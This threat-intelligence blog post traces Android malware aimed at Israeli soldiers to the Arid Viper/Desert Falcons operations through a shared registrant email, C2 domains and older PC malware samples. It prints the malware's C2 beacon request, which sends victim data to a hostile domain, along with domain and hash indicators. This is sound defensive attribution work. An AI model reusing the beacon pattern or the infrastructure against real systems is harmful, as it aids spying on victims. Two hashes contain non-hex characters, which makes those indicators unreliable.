Vipers, Falcons, and Droids: Apparent Link Between Arid Viper/Desert Falcons and Recent Android Malware Targeting Israeli Military

 

TARGET COUNTRY: ISRAEL

TARGET SECTOR: MILITARY

TOOLS: ANDROID MALWARE, UNIDENTIFIED PC MALWARE

On February 16, 2017, Kaspersky Labs released a blog post detailing a campaign using malware for the Android operating system to target members of the Israeli Defense Force (IDF). Although they don’t explicitly mention it, the activity described in Kaspersky’s post seems similar to activity reported in January 2017. Both Kaspersky and the January reports indicated that IDF soldiers were being targeted with Android malware via social engineering tactics using sexual themes coming from Facebook. The reports from January explicitly linked the campaign to Hamas.

The Cyber Intelligence and Analysis Project (CIPP) dug into the information that Kaspersky released in its blog post. None of the Android malware samples listed in the blog post appear to be available in free, public repositories; however, CIPP was able to pivot off of an email address used to register one of the reported command and control (C2) domains and, using open source tools and free services, identify additional network infrastructure and malware likely linked to the actors carrying out the Android malware campaign.

The additional malware identified by CIPP provides a link between the recent Android campaign targeting IDF soldiers and activity described by Trend Micro and Kaspersky from February 2015 in their Arid Viper and Desert Falcons reports.  

Registrant Email: info[@]palgoal[.]ps

Kaspersky reported five command and control (C2) domains related to the Android malware campaign it's been tracking:

  • androidbak[.]com
  • droidback[.]com
  • endpointup[.]com
  • siteanalysto[.]com
  • goodydaddy[.]com

The androidbak[.]com was registered using the email address info[@]palgoal[.]ps. 

As the screenshot above shows, androidbak[.]com was registered using information from an organization located in Gaza. This lines up nicely with Kaspersky's reporting saying that the Android malware campaign targeted IDF soldiers serving in Gaza. This registrant email address is actually an interesting case. Often, malicious actors will register their infrastructure under fake email addresses they’ve made up for that purpose. That doesn’t appear to be the case here. The palgoal[.]ps domain actually belongs to an apparently legitimate, Gaza-based web hosting and IT company, PalGoal. As will be discussed below, the email has registered multiple domains linked to malicious activity; however, there are no indications at this point that PalGoal is knowingly involved in malicious activity. It is possible that bad actors are merely leveraging PalGoal’s services for their operations. 

DomainTools shows 25 domains have been registered with the info[@]palgoal[.]ps email. Without a paid subscription, DomainTools won’t reveal what specific domains have been registered using that email. However, there’s a very useful free service called ThreatCrowd (https://www.threatcrowd.org/) which will often have this kind of information, and, in this instance, it does.

There are five suspicious domains highlighted in the screenshot above. The Kaspersky blog post confirms that the androidbak[.]com domain is known to be malicious. There are also three other Android-related domains registered using info[@]palgoal[.]ps which use a similar naming convention and are worth checking out. In addition, the dooownloads[.]com appears suspicious as well and deserves some investigation.

Discovering Older Malware Linked To This Campaign

A Google search for the dooownloads[.]com domain reveals that it appeared in a malware file submission to the free malware analysis platform, Malwr, back in October 2015. 

The dumped strings from this file show that dooownloads[.]com is hardcoded into the malware along with another domain, audioodrivers[.]com. Additionally, there appears to be another unique string related to the file's User Agent, "User-Agent: AudioDrive.” A Google search for this string shows that it appears in handful of other files submitted to various online malware analysis tools.

CCP was able to gather some basic information about these files including some file names and C2 domains:                                                          

                                                                                    Table 1. List of Files with "User-Agent: AudioDrive" String

Available information shows that all of these files make the same initial GET request to their C2 server:

GET /XSounds/sound_q.php?p=[victim machine data]—[unique identifier] HTTP/1.1
Accept: text/*
User-Agent: AudioDrive
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
REMOTE_USER: user
Host: oowdesign[.]com
Cache-Control: no-cache

The Colombia File

Among the malware files listed above is one with a rather interesting name, “helicoptero_en_Colombia.scr.” Given that the operator of the campaign being investigated appears to be focused on Israeli targets it is odd to see a related file with a Spanish language file name. 

               Decoy Video from helicoptero_en_Colombia.mp4

              Decoy Video from helicoptero_en_Colombia.mp4

Analysis of this file (MD5: 1d9ee9c96818ae46a2fee623b4f8e75c) reveals that it is a self-extracting archive (SFX) containing two files: VLC.exe and helicoptero_en_Colombia.mp4. The executable file is the malware. It connects to the C2 domain mentioned above, oowdesign[.]com, and has a compile date of September 14, 2015. 

While the malware is installed on the victim computer the mp4 file is played as a decoy to trick the victim into believing it is a legitimate file. As the file name would suggest, the decoy is a video of a Spanish language news broadcast regarding an August 2015 crash of a Blackhawk helicopter during an operation against the neo-paramilitary group, Los Urabeños. With the crash occurring in early August and the malware being compiled in mid-September 2015 it appears that the malware operator was attempting to use a relatively recent event in order to entice potential targets into opening the file.

Link Back To The Arid Viper Campaign

In addition to other malicious files, the previous screenshot of the Google search for the AudioDrive User Agent string shows a link to a blog written by the cybersecurity company Proofpoint in September 2015. The blog mentions the C2 domain identified above, oowdesign[.]com, and describes malware with the same behavior as the malware samples listed in Table 1. 

The Proofpoint blog expands on research done by Trend Micro about a campaign it dubbed “Operation Arid Viper” which it said exclusively targeted victims in Israel. At almost the same time Trend Micro released the Arid Viper report, Kaspersky released its own report on the same activity but referred to it as “Desert Falcons.” The Arid Viper and Desert Falcons reports detail campaigns with the same targeting and general tactics, techniques, and procedures (TTPs) as the recently identified Android malware campaign hitting IDF soldiers. Additionally the reports from Arid Viper and Desert Falcons describe malware that behaves very similarly to the older malware samples CCP identified above.

Additional Android Malware Sample

CCP discovered one final malware sample of note. A search of the malware analysis platform VirusTotal for the domain fastdroidmob[.]com shows it is linked to a malicious file.

Remember, the fastdroidmob[.]com domain was registered using the info[@]palgoal[.]ps which registered domains linked both to the recent Android malware campaign described by Kaspersky and the older malware CCP identified. VirusTotal analysis of the file linked to fastdroidmob[.]com shows it to be malware targeting the Android platform and was submitted in June 2016. Interestingly, Kaspersky's blog post stated that the campaign it described began around July 2016 so the June 2016 submission of the fastdroidmob[.]com file would predate that timeframe.

It's not clear whether the fastdroidmob[.]com is the same malware Kaspersky describes in its blog post, but there is a notable overlap here.

Assessment

While there is no smoking gun, the following factors suggest that the Android malware campaign described by Kaspersky in its recent blog post is linked to the Arid Viper/Desert Falcons campaign:

  • The info[@]palgoal[.]ps was used to register C2 infrastructure for the recent Android campaign as well as C2 infrastructure for the 2015 malware samples identified by CCP.
  • The 2015 malware samples behave consistently with those described in the Arid Viper/Desert Falcons reports.
  • That malware appears to be in limited use by only one entity, and not shared amongst multiple threat actors.
  • The Israel-focused targeting and general TTPs suggest that the recent Android campaign, the older CCP-identified malware, and the Arid Viper/Desert Falcons are linked together.

The file with the Spanish-language filename and Colombia-related decoy video still stands as somewhat of an outlier when considering the focus on Israeli targets by this activity. Kaspersky’s Desert Falcons report actually indicates a much larger target scope for this adversary with targets in numerous sectors located in nearly 50 countries; however, none of the countries included in that list are Spanish speaking. It is possible that the Spanish language decoy was meant to target Spanish-speaking individuals in non-Spanish-speaking countries or that it was used for some unknown reason. 

Malicious Files

b8237782486a26d5397b75eeea7354a777bff63a                 09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813                 9b923303f580c999f0fdc25cad600dd3550fe4e0                   0b58c883efe44ff010fl703db00c9ff4645b59df                     0a5dc47b06de545d8236d70efee801ca573115e7             782a0e5208c3d9e8942b928857a24183655e7470           5f71a8a50964dae688404ce8b3fbd83d6e36e5cd            03b404c8f4ead4aa3970b26eeeb268c594blbb47

Domains

androidbak[.]com
droidback[.]com
endpointup[.]com
siteanalysto[.]com
goodydaddy[.]com                                                                                                                               oowdesign[.]com
audioodrivers[.]com
androidmobgate[.]com
dooownloads[.]com
droidcart[.]com
fastdroidmob[.]com